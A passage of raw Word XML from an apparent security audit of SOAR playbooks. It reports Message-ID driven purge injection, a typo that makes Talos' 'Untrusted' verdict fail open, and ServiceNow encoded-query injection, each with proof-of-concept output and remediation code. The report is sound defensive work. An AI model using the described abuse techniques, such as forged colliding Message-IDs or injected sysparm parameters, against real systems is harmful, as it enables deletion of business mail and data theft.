        <w:t xml:space="preserve"> A03:2021 Injection. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1059 Command and Scripting Interpreter. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SI-10 Information Input Validation. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.PS Protect - Platform Security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.28 Secure coding. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SOAR playbooks / Input Validation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PB1-07 — Attacker-controlled e-mail Message-ID drives tenant-wide search, delete and restore (MS Graph, Gmail)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Medium (CVSS v3.1 base 5.4). Exploitability: Conditionally exploitable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> playbooks/MS_Graph_for_Office_365_Message_Eviction.py:30-97; MS_Graph_for_Office_365_Message_Restore.py:30-98; MS_Graph_for_Office_365_Message_Identifier_Activity_Analysis.py:68-104; G_Suite_for_GMail_Message_Identifier_Activity_Analysis.py:73-109; G_Suite_for_Gmail_Message_Eviction.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: These playbooks take an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>internet_message_id</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Message-ID</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> that originates from the headers of a reported/ingested e-mail and pass it to the connector's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>run query</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>internet_message_id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / Graph </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>$filter internetMessageId</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). The Search-and-Purge/Restore parents then delete or move *every* message the query matches across up to 500 mailboxes (Gmail) or the whole tenant (Graph). Because </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Message-ID</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is a fully attacker-chosen header, a crafted value can (a) carry query metacharacters for the connector's filter (OData </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>$filter</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/Gmail search - connector-dependent injection) and (b) be deliberately set to collide with a legitimate business message's id so the automation deletes it. The eviction/restore leaf playbooks themselves have no prompt; the gate lives only in the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Search_and_Purge</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> parents. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: e-mail header -&gt; artifact CEF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>internet message id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -&gt; child playbook -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>run query</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -&gt; delete/move. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Verdict: Conditionally exploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - injection depends on the connector's query parser; the "choose a colliding id to get a message purged" abuse works regardless, bounded by the parent's analyst prompt where present. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of concept</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: not separately executed - the eviction playbooks pass the id straight through as a structured </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>internet_message_id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> parameter (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Message_Eviction.py:38-45</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">); the risk is the downstream delete fan-out plus connector-side filter parsing, which cannot be exercised offline without the connector. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: validate the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Message-ID</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> against RFC 5322 msg-id syntax (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;local@domain&gt;</w:t>
      </w:r>
      <w:r>
        <w:t>, no spaces/control/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>), keep the human prompt on every purge path (not only the automation parents), and scope the search to the reporting mailbox where possible:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>import re</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>if not re.fullmatch(r'&lt;[^&lt;&gt;@\s]+@[^&lt;&gt;@\s]+&gt;', message_id or ''):</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phantom.error(f"Rejected Message-ID {message_id!r}"); return</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-20 Improper Input Validation (2024 CWE Top 25 #12); CWE-943 Improper Neutralization of Special Elements in Data Query Logic; CWE-74 Improper Neutralization of Special Elements in Output Used by a Downstream Component (Injection). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A03:2021 Injection, A04:2021 Insecure Design. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1114 Email Collection, T1070 Indicator Removal. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SI-10 Information Input Validation, IR-4 Incident Handling. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.PS Protect - Platform Security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.28 Secure coding. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SOAR playbooks / Input Validation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PB1-08 — Cisco Talos Untrusted verdict never maps to Malicious (unstrusted typo) - fail-open scoring</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Medium (CVSS v3.1 base 5.3). Exploitability: Exploitable as detection evasion (PoC executed).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> playbooks/CiscoTalosIntelligence_Identifier_Reputation_Analysis.py:382,457,521</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>382  talos_to_score_mapping = {"unknown": "Unknown", "trusted": "Safe", "favorable": "Probably_Safe",</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"neutral": "May_not_be_Safe", "questionable": "Suspicious_or_Risky",</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"unstrusted": "Malicious"}      # &lt;-- should be "untrusted"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>399  score = talos_to_score_mapping.get(threat_level.lower(), "")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: The key for the worst Talos verdict is misspelled </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>"unstrusted"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Talos returns </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Untrusted</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, lower-cased to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>untrusted</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, which is not in the dict, so </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.get(..., "")</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> returns an empty score and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>score_table.get("", "")</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> leaves </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>score_id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> empty. The most malicious reputation therefore produces *no* score. Any downstream decision keyed on this score (e.g. reputation-dispatch tagging, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>score_id &gt;= 0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> routing in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Identifier_Reputation_Analysis_Dispatch.py:96</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) treats a confirmed-bad indicator as unscored/benign - a fail-open that lets malicious URLs/domains/IPs through enrichment. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: the verdict comes from Talos about an attacker-chosen indicator; the attacker benefits from the mis-scoring without needing to control the verdict string. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Verdict: Exploitable as a detection-evasion / fail-open logic flaw</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (integrity of the verdict). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of concept</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>poc_logic.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> case 3, real output) - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Threat_Level="Untrusted"</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>reputation: {"threat_level": "Untrusted", ..., "score": "", "score_id": ""}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Empty score for a maximally-malicious verdict. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t>: fix the key (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>"untrusted": "Malicious"</w:t>
      </w:r>
      <w:r>
        <w:t>) and fail safe on unknown verdicts:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>talos_to_score_mapping = {"unknown":"Unknown","trusted":"Safe","favorable":"Probably_Safe",</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"neutral":"May_not_be_Safe","questionable":"Suspicious_or_Risky","untrusted":"Malicious"}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>score = talos_to_score_mapping.get(threat_level.lower(), "Suspicious_or_Risky")  # unknown -&gt; treat as risky, not blank</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-697 Incorrect Comparison; CWE-478; CWE-636 Not Failing Securely (Failing Open). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A04:2021 Insecure Design. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1562 Impair Defenses. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SI-10 Information Input Validation, SI-4 System Monitoring. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DE.AE Detect - Adverse Event Analysis. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.16 Monitoring activities. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SOAR playbooks / General Coding Practices.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PB1-05 — ServiceNow sysparm_query (encoded query and URL parameter) injection via search_term</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Medium (CVSS v3.1 base 5.0). Exploitability: Conditionally exploitable (PoC executed).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> playbooks/ServiceNow_Related_Tickets_Search.py:82-108,341-385</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>347  query_formatted_string = phantom.format(container=container,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>349      template="""sysparm_query=active=true^IR_OR_QUERY={0}^opened_at&gt;javascript:gs.dateGenerate({1})&amp;sysparm_display_value=true \n\n""",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>350      parameters=["space_delimiter_input:formatted_data", "calculate_earliest_time:custom_function_result.data.datetime_string"])</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t>: The search term is placed into a ServiceNow encoded query. The template mixes the encoded-query language (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>^</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>^OR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>^NQ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ORDERBY</w:t>
      </w:r>
      <w:r>
        <w:t>) *and* URL parameters (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&amp;sysparm_display_value=true</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) in one string. Unlike the Jira playbook (which escapes, see PB1-05 note), there is no escaping of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>^</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, so a crafted term can append encoded-query operators or extra </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sysparm_*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> URL parameters (e.g. raise </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sysparm_limit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, add </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sysparm_fields</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to pull </w:t>
      </w:r>
      <w:r>
        <w:rPr>
